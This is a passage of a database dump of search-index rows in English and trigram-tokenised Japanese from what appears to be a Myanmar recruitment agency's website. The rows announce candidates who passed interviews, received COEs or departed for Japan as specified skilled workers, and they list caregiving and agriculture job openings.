(146, 'en', 'node_search', ' congratulations thet htar myint ko hsu myat hmue hnin yu hlaing wai wai khaing chaw hsu thwe for passing the interview congratulations thet htar myint ko hsu myat hmue hnin yu hlaing wai wai khaing chaw hsu thwe for passing the interview admin fri 6282024 1713 fri 6282024 900 congratulations for passing the interview  congratulations thet htar myint ko hsu myat hmue hnin yu hlaing wai wai khaing chaw hsu thwe for passing the interview congratulations thet htar myint ko hsu myat hmue hnin yu hlaing wai wai khaing chaw hsu thwe for passing the interview  ', 0),
(146, 'ja', 'node_search', ' congratulations for passing the interview congratulations for passing the interview admin fri 6282024 1719 fri 6282024 900  面接合 接合格 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  thet htar myint ko hsu myat hmue hnin yu hlaing wai wai khaing chaw hsu thwe の皆さ 皆さん 面接合 接合格 合格お 格おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(147, 'en', 'node_search', ' congratulations kyaw zin latt for getting coe  congratulations kyaw zin latt for getting coe admin sat 6292024 1045 fri 6282024 900 congratulations  congratulations kyaw zin latt for getting coe with tokutei gaishoku to work at japan    ', 0),
(147, 'ja', 'node_search', ' congratulations kyaw zin latt for getting coe  congratulations kyaw zin latt for getting coe admin sat 6292024 1054 fri 6282024 900  おめで めでと でとう とうご うござ ござい ざいま います  kyaw zin latt さん tokutei gaishoku から coe を取得 取得し 得して して日 て日本 日本で 本で働 で働く 働くこ くこと ことが とがで ができ できま きまし ました おめで めでと でとう とうご うござ ござい ざいま います    ', 0),
(148, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 7022024 1418 tue 7022024 900 congratulations  congratulations myo khant for getting coe  ', 0),
(148, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin tue 7022024 1419 tue 7022024 900  おめで めでと でとう とうご うござ ござい ざいま います  myo khant さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(149, 'en', 'node_search', ' congratulations for passing the interview congratulations for passing the interview admin thu 7042024 1450 tue 7022024 900 congratulations for passing the interview  congratulations than win soe hsu yandar for passing the interview  ', 0),
(150, 'en', 'node_search', ' training about cpr kaigo  training about cpr kaigo admin thu 7042024 1455 sun 6302024 900 training about cpr kaigo  they are diligently engaged in their endeavors within the akita district of japan hoping for the opportunity to reside in the country for an extended period  ', 0),
(150, 'ja', 'node_search', ' training about cpr kaigo  training about cpr kaigo admin thu 7042024 1513 sun 6302024 900 cpr 介護 に関す 関する する研 る研修   彼らは らは秋 は秋田 秋田県 田県内 県内で 内での での活 の活動 活動に 動に熱 に熱心 熱心に 心に取 に取り 取り組 り組ん 組んで んでお でおり 長期に 期にわ にわた わたっ たって って秋 て秋田 秋田県 田県に 県に居 に居住 居住す 住する する機 る機会 機会を 会を望 を望ん 望んで んでい でいま います  ', 0),
(151, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin thu 7042024 1518 thu 7042024 900 congratulations for getting coe  congratulations hlaing mee mee htike pyae su su san for getting coe  ', 0),
(151, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin thu 7042024 1519 thu 7042024 900 coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  hlaing mee mee htike と pyae su su san coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(152, 'en', 'node_search', ' congratulation for getting coe congratulation for getting coe admin sat 7062024 1216 thu 7042024 1030 coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  hlaing mee mee htike さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(152, 'ja', 'node_search', ' congratulation for getting coe congratulation for getting coe admin sat 7062024 1247 thu 7042024 1030 coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  hlaing mee mee htike さん coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(153, 'en', 'node_search', ' congratulations for getting coe congratulations for getting coe admin mon 7082024 1746 mon 7082024 900 congratulations for getting coe  congratulations moe set naing paing thu san htet lin aung thant zin win hpone myat naing ei kay zin for getting coe  ', 0),
(153, 'ja', 'node_search', ' congratulations for getting coe congratulations for getting coe admin mon 7082024 1750 mon 7082024 900 coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  moe set naing paing thu san htet lin aung thant zin win hpone myat naing ei kay zin の coe 取得お 得おめ おめで めでと でとう とうご うござ ござい ざいま います  ', 0),
(154, 'en', 'node_search', ' five caregiver workers departed for japan under the specified skilled worker kaigo program five caregiver workers departed for japan under the specified skilled worker kaigo program admin fri 6192026 1234 sun 6142026 936 departure to japan 14 june 2026 new comet trading agency is pleased to announce that the following candidates successfully departed for japan on 14 june 2026 under the specified skilled worker kaigo program khin moe thi khin min cho aye mya nilar oo nan dar kyaw ei ei phyo we sincerely congratulate all five candidates and wish them success in their new careers in japan may they enjoy a safe journey achieve their professional goals and become a source of pride and support for their families new comet trading agency will continue to support myanmar workers in pursuing employment opportunities abroad five candidates successfully departed for japan on 14 june 2026 to begin employment under the specified skilled worker kaigo program  ', 0),
(154, 'ja', 'node_search', '  特定技 定技能 介護 人材 5 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 介護 人材 5 名 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1244 sun 6142026 936 2026 年 6 月 14 日 日本出 本出発   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 以下の 5 名の候 の候補 候補者 補者が 者が特 が特定 特定技 定技能 介護 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します khin moe thi さん khin min cho さん aye mya nilar oo さん nan dar kyaw さん ei ei phyo さん 皆様の 様の新 の新し 新しい しいキ いキャ キャリ ャリア リアの アのス のスタ スター タート ートを トを心 を心よ 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げま げます 日本で 本での での生 の生活 生活と 活と仕 と仕事 仕事が 事が順 が順調 順調に 調に進 に進み ご家族 家族の 族の支 の支え 支えと えとな となる なる素 る素晴 素晴ら 晴らし らしい しい人 い人材 人材と 材とし として してご てご活 ご活躍 活躍さ 躍され される れるこ ること ことを とを願 を願っ 願って ってお ており おりま ります ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは 今後も 後もミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の海 の海外 海外就 外就労 就労を 労を支 を支援 支援し 援して してま てまい まいり いりま ります 2026 年 6 月 14 日 特定技 定技能 介護 として 5 名の候 の候補 候補者 補者が 者が日 が日本 日本へ 本へ出 へ出発 出発し 発しま しまし ました  ', 0),
(155, 'en', 'node_search', ' new hotel tokutei preparation class now open new hotel tokutei preparation class now open admin fri 6192026 1258 hotel tokutei preparation class new intake open sun 6142026 959 hotel tokutei preparation class new intake open new comet language center is pleased to announce the opening of a new hotel tokutei preparation class for candidates who wish to work in hotels ryokans and resorts in japan this course is designed to help students prepare for the specified skilled worker tokutei ginou hotel examination job interviews and future workplace responsibilities in the hospitality industry course information start date 15 june 2026 class days monday thursday class time 1100 am 1230 pm course duration 2 months course fee 180000 mmk special benefits  textbook included uniform included the hotel tokutei sector is currently one of the most indemand industries in japan this course is recommended for individuals who wish to prepare for the hotel tokutei examination build a career in the hospitality industry work in japan through the specified skilled worker program for further information please contact us through our facebook page messenger  ', 0),
(155, 'ja', 'node_search', '  ホテル テル分 ル分野 特定技 定技能 技能試 能試験 試験対 験対策 対策ク 策クラ クラス ラス開 ス開講 開講の 講のお のお知 お知ら 知らせ   ホテル テル分 ル分野 特定技 定技能 技能試 能試験 試験対 験対策 対策ク 策クラ クラス ラス開 ス開講 開講の 講のお のお知 お知ら 知らせ admin fri 6192026 1330 ホテル テル特 ル特定 特定技 定技能 技能対 能対策 対策ク 策クラ クラス 新規開 規開講 sun 6142026 959  ホテル テル特 ル特定 特定技 定技能 技能対 能対策 対策ク 策クラ クラス 新規開 規開講   ニュー ューコ ーコメ コメッ メット ット ト ラ ラン ランゲ ンゲー ゲージ ージセ ジセン センタ ンター ターで ーでは 日本の 本のホ のホテ ホテル テル ル 旅 旅館 旅館 館 リ リゾ リゾー ゾート ート施 ト施設 施設で 設での での就 の就職 就職を 職を目 を目指 目指す 指す方 々 を対象 対象に ホテル テル分 ル分野 分野特 野特定 特定技 定技能 技能試 能試験 試験対 験対策 対策ク 策クラ クラス ラスを スを開 を開講 開講い 講いた いたし たしま します 本コー コース ースで スでは 特定技 定技能 宿泊分 泊分野 試験対 験対策 対策だ 策だけ だけで けでな でなく 面接対 接対策 対策や 策や実 や実際 実際の 際の職 の職場 職場で 場で必 で必要 必要と 要とな となる なる知 る知識 知識や 識やマ やマナ マナー ナーに ーにつ につい ついて いても ても学 も学ぶ 学ぶこ ぶこと ことが とがで ができ できま きます   コース ース概 ス概要   開講日 2026 年 6 月 15 日 授業日 月曜日 木曜日 授業時 業時間 午前 11 時  分 午後 12 時 30 分 受講期 講期間 2 か月 受講料 180000 mmk  特典   教科書 科書付 書付き 制服付 服付き 宿泊分 泊分野 分野の 野の特 の特定 特定技 定技能 技能人 能人材 人材は 現在日 在日本 日本国 本国内 国内で 内で高 で高い 高い需 い需要 需要が 要があ があり ありま ります 本コー コース ースは スは以 は以下 以下の 下のよ のよう ような うな方 な方に 方にお におす おすす すすめ すめで めです ホテル テル特 ル特定 特定技 定技能 技能試 能試験 試験の 験の合 の合格 合格を 格を目 を目指 目指す 指す方 ホスピ スピタ ピタリ タリテ リティ ティ業 ィ業界 業界に 界に興 に興味 興味の 味のあ のある ある方 日本で 本で働 で働く 働くこ くこと ことを とを目 を目標 目標と 標とし として してい ている いる方 詳細に 細につ につい ついて いては facebook ページ ージの ジのメ のメッ メッセ ッセン センジ ンジャ ジャー ャーよ ーより よりお りお気 お気軽 気軽に 軽にお にお問 お問い 問い合 い合わ 合わせ わせく せくだ くださ ださい  ', 0),
(156, 'en', 'node_search', ' departure to japan specified skilled worker food service industry  departure to japan specified skilled worker food service industry admin fri 6192026 1356 tue 4212026 900 on april 21 2026 new comet agency proudly bid farewell to our candidate ms thwel thwel aye as she departed for japan she will be working in the restaurant and food service industry under the specified skilled worker tokutei ginou program the entire team at new comet agency wishes her a safe flight and great success in her new career we are confident that she will excel in her work in japan and make her family proud congratulations on april 21 2026 ms thwel thwel aye successfully departed for japan to begin her new career in the restaurant industry under the specified skilled worker program  ', 0),
(156, 'ja', 'node_search', '  出国報 国報告 特定技 定技能 外食業 で日本 日本へ 本へ出 へ出発 出発し 発しま しまし ました   出国報 国報告 特定技 定技能 外食業 で日本 日本へ 本へ出 へ出発 出発し 発しま しまし ました admin fri 6192026 1402 tue 4212026 900 2026 年 4 月 21 日 当機関 new comet agency を通じ 通じて じて採 て採用 採用さ 用され された れた候 た候補 候補生 thwel thwel aye さんが 特定技 定技能 外食業 の資格 資格で 格で日 で日本 日本へ 本へ向 へ向け 向けて けて出 て出発 出発い 発いた いたし たしま しまし ました 彼女の 女の安 の安全 安全な 全なフ なフラ フライ ライト イトと トと日 と日本 日本で 本での でのご のご活 ご活躍 そして してご てご家 ご家族 家族の 族の誇 の誇り 誇りと りとな となる なるよ るよう ような うな素 な素晴 素晴ら 晴らし らしい しいキ いキャ キャリ ャリア リアを アを築 を築か 築かれ かれる れるこ ること ことを とをス をスタ スタッ タッフ ッフ一 フ一同 心より よりお りお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます 2026 年 4 月 21 日 当機関 機関を 関を通 を通じ 通じて じて採 て採用 採用さ 用され された れた候 た候補 候補生 thwel thwel aye さんが んが特 が特定 特定技 定技能 外食業 で日本 日本へ 本へ出 へ出発 出発い 発いた いたし たしま しまし ました  ', 0),
(157, 'en', 'node_search', ' group departure to japan specified skilled worker food service industry  group departure to japan specified skilled worker food service industry admin fri 6192026 1410 sun 4262026 908 on april 26 2026 new comet agency proudly bid farewell to a group of nine talented candidates as they departed for japan they will be working in the restaurant and food service industry under the specified skilled worker tokutei ginou program the departing candidates are hnin su hlaing ei thandar naing hnin eaindray phyo pyae pyae phyo khaing shwe syn soe nwe nwe khaing yadana lwin zin mon myat wai mon thant the entire team at new comet agency wishes them a safe flight and great success in their new careers we are confident that they will excel in their work in japan and make their families proud congratulations on april 26 2026 nine candidates from new comet agency successfully departed for japan to begin their careers in the restaurant industry under the specified skilled worker program  ', 0),
(157, 'ja', 'node_search', '  出国報 国報告 特定技 定技能 外食業 で 9 名が日 が日本 日本へ 本へ出 へ出発 出発し 発しま しまし ました   出国報 国報告 特定技 定技能 外食業 で 9 名が日 が日本 日本へ 本へ出 へ出発 出発し 発しま しまし ました admin fri 6192026 1359 sun 4262026 908 2026 年 4 月 26 日 当機関 new comet agency を通じ 通じて じて採 て採用 採用さ 用され された 9 名の候 の候補 候補生 補生が 特定技 定技能 外食業 の資格 資格で 格で日 で日本 日本へ 本へ向 へ向け 向けて けて出 て出発 出発い 発いた いたし たしま しまし ました 出発し 発した した候 た候補 候補生 補生は 生は以 は以下 以下の 下の通 の通り 通りで りです hnin su hlaing さん ei thandar naing さん hnin eaindray phyo さん pyae pyae phyo さん khaing shwe syn soe さん nwe nwe khaing さん yadana lwin さん zin mon myat さん wai mon thant さん 彼女た 女たち たちの ちの安 の安全 安全な 全なフ なフラ フライ ライト イトと トと日 と日本 日本で 本での でのご のご活 ご活躍 そして してご てご家 ご家族 家族の 族の誇 の誇り 誇りと りとな となる なるよ るよう ような うな素 な素晴 素晴ら 晴らし らしい しいキ いキャ キャリ ャリア リアを アを築 を築か 築かれ かれる れるこ ること ことを とをス をスタ スタッ タッフ ッフ一 フ一同 心より よりお りお祈 お祈り 祈り申 り申し 申し上 し上げ 上げま げます 2026 年 4 月 26 日 当機関 機関を 関を通 を通じ 通じて じて採 て採用 採用さ 用され された れた候 た候補 候補生 9 名が 特定技 定技能 外食業 で日本 日本へ 本へ出 へ出発 出発い 発いた いたし たしま しまし ました  ', 0),
(160, 'en', 'node_search', ' candidate successfully passed tokutei food service interview candidate successfully passed tokutei food service interview admin fri 6192026 1458 mon 3022026 959 a new step toward a career in japan new comet trading agency is proud to announce that ms toe toe hlaing has successfully passed the interview for a specified skilled worker tokutei ginou food service position in japan her success is the result of dedication preparation and a strong commitment to achieving her goal of working in japan we would like to extend our heartfelt congratulations on this achievement and wish her continued success throughout the upcoming procedures and her future career in japan new comet trading agency remains dedicated to connecting qualified myanmar candidates with rewarding employment opportunities in japan  ms toe toe hlaing successfully passed the interview for a specified skilled worker food service position in japan   ', 0),
(160, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のご のご報 ご報告   特定技 定技能 外食業 面接合 接合格 合格の 格のご のご報 ご報告 admin fri 6192026 1500 mon 3022026 959  日本で 本での でのキ のキャ キャリ ャリア リアへ アへの への第 の第一 第一歩   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは toe toe hlaing さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します 今回の 回の合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と熱 と熱心 熱心な 心な準 な準備 準備の 備の成 の成果 成果で 果であ であり 日本で 本で働 で働く 働くと くとい という いう目 う目標 目標に 標に向 に向け 向けた けた大 た大き 大きな きな一 な一歩 一歩と 歩とな となり なりま りまし ました この素 の素晴 素晴ら 晴らし らしい しい成 い成果 成果を 果を心 を心よ 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは これか れから からも らもミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材と 材と日 と日本 日本企 本企業 企業を 業をつ をつな つなぐ なぐ架 ぐ架け 架け橋 け橋と 橋とし として して支 て支援 支援を 援を続 を続け 続けて けてま てまい まいり いりま ります  toe toe hlaing さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(161, 'en', 'node_search', ' candidate successfully passed tokutei food service interview candidate successfully passed tokutei food service interview admin fri 6192026 1503 tue 2032026 902 interview success announcement new comet trading agency is pleased to announce that ms myat thandar kyaw has successfully passed the interview for a specified skilled worker tokutei ginou food service position in japan this achievement reflects her dedication preparation and determination to pursue a professional career in japan s food service industry we sincerely congratulate her on this important milestone and wish her continued success in the upcoming procedures and future career in japan new comet trading agency remains committed to supporting and preparing candidates for employment opportunities in japan through our recruitment and training programs congratulations and best wishes for the journey ahead  ms myat thandar kyaw successfully passed the interview for a specified skilled worker food service position in japan   ', 0),
(161, 'ja', 'node_search', '  特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ   特定技 定技能 外食業 面接合 接合格 合格の 格のお のお知 お知ら 知らせ admin fri 6192026 1501 tue 2032026 902  面接合 接合格 合格の 格のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは myat thandar kyaw さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され された れたこ たこと ことを とをお をお知 お知ら 知らせ らせい せいた いたし たしま します このた のたび たびの びの合 の合格 合格は ご本人 本人の 人の努 の努力 努力と 力と熱 と熱心 熱心な 心な準 な準備 準備の 備の成 の成果 成果で 果であ であり 日本で 本での での外 の外食 外食業 食業界 業界で 界での でのキ のキャ キャリ ャリア リアへ アへの への大 の大き 大きな きな第 な第一 第一歩 一歩と 歩とな となり なりま ります 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 今後の 後の手 の手続 手続き 続きと きと日 と日本 日本で 本での でのご のご活 ご活躍 活躍を 躍をお をお祈 お祈り 祈りい りいた いたし たしま します ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは これか れから からも らもミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の育 の育成 育成と 成と日 と日本 日本就 本就職 就職支 職支援 支援に 援に努 に努め 努めて めてま てまい まいり いりま ります おめで めでと でとう とうご うござ ござい ざいま います 今後の 後のさ のさら さらな らなる なるご るご成 ご成功 成功を 功を願 を願っ 願って ってお ており おりま ります myat thandar kyaw さんが んが特 が特定 特定技 定技能 外食業 の採用 採用面 用面接 面接に 接に合 に合格 合格さ 格され されま れまし ました  ', 0),
(162, 'en', 'node_search', ' home care caregiver position available in aichi japan home care caregiver position available in aichi japan admin fri 6192026 1527 exciting career opportunity for jlpt n2 holders with a tokutei ginou kaigo certificate to work in aichi prefecture japan wed 6172026 929 specified skilled worker kaigo home care position in japan new comet trading agency is pleased to introduce an exciting employment opportunity for qualified caregivers seeking to build a longterm career in japan unlike conventional nursing home or care facility positions this home care 訪問介 問介護 role involves providing direct care and support to elderly individuals in their own homes this profession is highly respected in japan and offers a rewarding opportunity to make a meaningful difference in people s daily lives job location aichi prefecture nagoya area  job responsibilities  meal preparation and assistance with daily nutrition bathing and personal care support assistance with walking and wheelchair mobility housekeeping laundry and shopping support accompanying clients to hospitals and medical appointments salary and benefits  basic salary 210000 yen per month expected monthly income approximately 230000 yen or more including overtime and bonuses housing cost approximately 35000 yen per month days off two days per week working hours shiftbased schedule requirements  jlpt n2 certificate tokutei ginou kaigo certificate strong commitment to building a longterm career in japan responsible patient and compassionate personality applicants with caregiving experience will be given preference interested candidates are encouraged to contact new comet trading agency for further information  ', 0),
(162, 'ja', 'node_search', '  愛知県 訪問介 問介護 介護ス 護スタ スタッ タッフ ッフ募 フ募集 特定技 定技能 技能 能 介 介護   愛知県 訪問介 問介護 介護ス 護スタ スタッ タッフ ッフ募 フ募集 特定技 定技能 技能 能 介 介護 admin fri 6192026 1529 jlpt n2 および よび特 び特定 特定技 定技能 介護 資格保 格保持 保持者 持者を 者を対 を対象 対象と 象とし とした した愛 た愛知 愛知県 知県で 県での での訪 の訪問 訪問介 問介護 介護求 護求人 求人で 人です wed 6172026 929  特定技 定技能 介護 訪問介 問介護 介護ス 護スタ スタッ タッフ ッフ募 フ募集   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーで ーでは 日本で 本で長 で長期 長期的 期的な 的なキ なキャ キャリ ャリア リア形 ア形成 形成を 成を目 を目指 目指す 指す介 す介護 介護人 護人材 人材の 材の皆 の皆様 皆様に 訪問介 問介護 介護の 護のお のお仕 お仕事 仕事を 事をご をご紹 ご紹介 紹介い 介いた いたし たしま します 本求人 求人は 人は介 は介護 介護施 護施設 施設勤 設勤務 勤務と 務とは とは異 は異な 異なり ご利用 利用者 用者様 者様の 様のご のご自 ご自宅 自宅を 宅を訪 を訪問 訪問し 日常生 常生活 生活の 活のサ のサポ サポー ポート ートを トを行 を行う 行うお うお仕 お仕事 仕事で 事です 日本社 本社会 社会に 会にお におい おいて いて高 て高く 高く評 く評価 評価さ 価され されて れてい ている いる介 る介護 介護サ 護サー サービ ービス ビスの スの一 の一つ 一つで つです   勤務地   愛知県 名古屋 古屋エ 屋エリ エリア   業務内 務内容   食事の 事の準 の準備 準備お 備およ および よび介 び介助 入浴 浴 身 身体 身体介 体介護 歩行や 行や車 や車椅 車椅子 椅子移 子移動 移動の 動のサ のサポ サポー ポート 掃除 除 洗 洗濯 洗濯 濯 買 買い 買い物 い物支 物支援 通院時 院時の 時の付 の付き 付き添 き添い   給与 与 待 待遇   基本給 210000 円 月 想定月 定月収 230000 円以上 残業代 業代 代 賞 賞与 賞与含 与含む 住宅費 約 35000 円 月 休日 週 2 日 勤務時 務時間 シフト フト制   応募条 募条件   jlpt n2 合格者 特定技 定技能 介護 資格保 格保持 保持者 日本で 本で長 で長期 長期的 期的な 的なキ なキャ キャリ ャリア リア形 ア形成 形成を 成を希 を希望 希望す 望する する方 責任感 任感が 感があ があり 思いや いやり やりを りを持 を持っ 持って って働 て働け 働ける ける方 介護経 護経験 経験者 験者は 者は優 は優遇 優遇い 遇いた いたし たしま します 詳細に 細につ につい ついて いては ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーま ーまで までお でお問 お問い 問い合 い合わ 合わせ わせく せくだ くださ ださい  ', 0),
(163, 'en', 'node_search', ' agriculture workers wanted for tokutei program in japan agriculture workers wanted for tokutei program in japan admin fri 6192026 1534 employment opportunity in tsukuba city ibaraki prefecture for candidates with agricultural experience and jlpt n4 or above tue 6162026 936 specified skilled worker agriculture job opportunity in japan new comet trading agency is currently recruiting candidates for an agriculture specified skilled worker tokutei ginou position in japan this opportunity is suitable for individuals with agricultural experience who wish to build a longterm career in japan work location tsukuba city ibaraki prefecture japan job responsibilities  green onion negi cultivation and harvesting agricultural production and farm management support packing and packaging agricultural products preparing products for shipment and distribution salary and benefits  hourly wage 1080 average monthly salary 200000 250000 overtime opportunities available potential monthly income up to approximately 300000 including overtime working hours  summer season between 500 am and 800 pm 8hour shift schedule days off  1 to 2 days per week accommodation  company housing available housing fee 20000 per month 12 persons per room detached house accommodation utilities paid according to actual usage requirements  jlpt n4 or above ability to communicate in daily japanese conversation agricultural work experience preferred good physical health applicants with a driver s license will be given priority consideration only six positions are available interested candidates are encouraged to apply as soon as possible for further information please contact new comet trading agency  ', 0),
(163, 'ja', 'node_search', '  特定技 定技能 農業 スタッ タッフ ッフ募 フ募集 茨城県 城県つ 県つく つくば くば市   特定技 定技能 農業 スタッ タッフ ッフ募 フ募集 茨城県 城県つ 県つく つくば くば市 admin fri 6192026 1538 農業経 業経験 経験が 験があ があり jlpt n4 以上の 上の方 の方を 方を対 を対象 対象と 象とし とした した茨 た茨城 茨城県 城県つ 県つく つくば くば市 ば市で 市での での特 の特定 特定技 定技能 農業 求人で 人です tue 6162026 936  特定技 定技能 農業 求人募 人募集 募集の 集のお のお知 お知ら 知らせ   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーで ーでは 日本で 本で長 で長期 長期的 期的に 的に働 に働き 働きた きたい たい方 い方を 方を対 を対象 対象に 特定技 定技能 農業 人材を 材を募 を募集 募集し 集して してお ており おりま ります 農業経 業経験 経験を 験を活 を活か 活かし かしな しなが ながら 日本で 本で安 で安定 安定し 定した したキ たキャ キャリ ャリア リアを アを築 を築く 築くこ くこと ことが とがで ができ できる きる求 る求人 求人で 人です   勤務地   茨城県 城県つ 県つく つくば くば市   業務内 務内容   ネギの ギの栽 の栽培 栽培お 培およ および よび収 び収穫 収穫作 穫作業 農作物 作物の 物の生 の生産 生産管 産管理 管理補 理補助 箱詰め 詰め め 包 包装 包装作 装作業 出荷準 荷準備 準備作 備作業   給与 与 待 待遇   時給 1080 円 月収目 収目安 200000 円 250000 円 残業あ 業あり 残業を 業を含 を含め 含めた めた月 た月収 月収は 収は約 300000 円まで まで可 で可能   勤務時 務時間   夏季 午前 5 時から から午 ら午後 8 時の間 実働 8 時間 シフト フト制   休日   週 1 日 2 日   住居   会社寮 社寮あ 寮あり 寮費 月 20000 円 1 部屋 1 2 名利用 一戸建 戸建て 建てタ てタイ タイプ 光熱費 熱費は 費は実 は実費 実費負 費負担   応募条 募条件   jlpt n4 以上 日常会 常会話 会話レ 話レベ レベル ベルの ルの日 の日本 日本語 本語能 語能力 農業経 業経験 経験者 験者歓 者歓迎 健康で 康で体 で体力 体力に 力に自 に自信 自信の 信のあ のある ある方 運転免 転免許 免許を 許をお をお持 お持ち 持ちの ちの方 の方は 方は優 は優遇 優遇い 遇いた いたし たしま します 募集人 集人数 人数は 6 名限定 限定で 定です ご興味 興味の 味のあ のある ある方 る方は 方はお はお早 お早め 早めに めにお にお問 お問い 問い合 い合わ 合わせ わせく せくだ くださ ださい  ', 0),
(164, 'en', 'node_search', ' hotel worker begins career journey in japan hotel worker begins career journey in japan admin fri 6192026 1545 a new chapter begins in japan new comet trading agency is pleased to announce that ms su myat win successfully departed for japan on 14 june 2026 under the specified skilled worker hotel program this marks an important milestone in her professional journey as she begins a new career in japan s hospitality industry we extend our warmest congratulations and best wishes as she embarks on this exciting opportunity may her experience in japan be rewarding successful and filled with valuable learning opportunities new comet trading agency remains committed to supporting myanmar candidates in achieving their goals through international employment opportunities ms su myat win successfully departed for japan on 14 june 2026 to begin her career under the specified skilled worker hotel program  ', 0),
(164, 'ja', 'node_search', '  特定技 定技能 宿泊 人材 日本出 本出発 出発の 発のお のお知 お知ら 知らせ   特定技 定技能 宿泊 人材 日本出 本出発 出発の 発のお のお知 お知ら 知らせ admin fri 6192026 1553  日本で 本での での新 の新た 新たな たなス なスタ スター タート   ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは su myat win さんが 2026 年 6 月 14 日に特 に特定 特定技 定技能 宿泊 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され された れたこ たこと ことを とをご をご報 ご報告 報告い 告いた いたし たしま します 日本の 本の宿 の宿泊 宿泊業 泊業界 業界で 界で新 で新た 新たな たなキ なキャ キャリ ャリア リアを アをス をスタ スター タート ートさ トされ される れるこ ること ことと ととな となり ご本人 本人に 人にと にとっ とって って大 て大き 大きな きな節 な節目 節目と 目とな となる なる素 る素晴 素晴ら 晴らし らしい しい機 い機会 機会で 会です 心より よりお りお祝 お祝い 祝い申 い申し 申し上 し上げ 上げる げると るとと ととも ともに 日本で 本での での生 の生活 生活と 活と仕 と仕事 仕事が 事が充 が充実 充実し 実した したも たもの ものと のとな となり 多くの くの経 の経験 経験と 験と成 と成長 成長に 長につ につな つなが ながる がるこ ること ことを とを願 を願っ 願って ってお ており おりま ります ニュー ューコ ーコメ コメッ メット ット ト ト トレ トレー レーデ ーディ ディン ィング ング グ エ エー エージ ージェ ジェン ェンシ ンシー シーは これか れから からも らもミ もミャ ミャン ャンマ ンマー マー人 ー人材 人材の 材の海 の海外 海外就 外就労 就労を 労を支 を支援 支援し 援して してま てまい まいり いりま ります su myat win さんが 2026 年 6 月 14 日に特 に特定 特定技 定技能 宿泊 として して日 て日本 日本へ 本へ出 へ出発 出発さ 発され されま れまし ました  ', 0),
(165, 'en', 'node_search', ' four caregiver workers departed for japan four caregiver workers departed for japan admin fri 6192026 1556 wed 6032026 956 departure to japan 3 june 2026 new comet trading agency is pleased to announce that four candidates successfully departed for japan on 3 june 2026 under the specified skilled worker kaigo program the candidates are thae su su aye hnin yu war hsu mon htet shwe sin win their departure marks an important milestone after months of preparation training and dedication toward building a professional career in japan s caregiving sector we extend our sincere congratulations and wish them success personal growth and a rewarding experience in japan may they achieve their goals and contribute positively to their workplaces and communities new comet trading agency will continue to support myanmar workers in pursuing meaningful career opportunities abroad four candidates successfully departed for japan on 3 june 2026 to begin their careers under the specified skilled worker kaigo program  ', 0),
